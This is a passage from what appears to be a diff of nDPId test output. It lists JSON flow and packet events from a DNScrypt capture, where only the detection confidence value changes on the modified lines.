+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAIctENAAL0RBKMKAAABzbl0dJffAikCCAUEnSsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAIctERAAL0RBKIKAAABzbl0dKoIAikCCAUEnSkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAXctEUgAL0RIOEKAAABzbl0dMo6AikGBP1vnSoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAXctEYgAL0RIOAKAAABzbl0dJWGAikGBDIonSYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":197,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739311153} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":197,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAABQtEUAub0RRbQKAAABzbl0dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":198,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739311153} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":198,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAABQtEYAub0RRbMKAAABzbl0dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAXctEcgAL0RIN8KAAABzbl0dNoOAikGBO2dnSgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 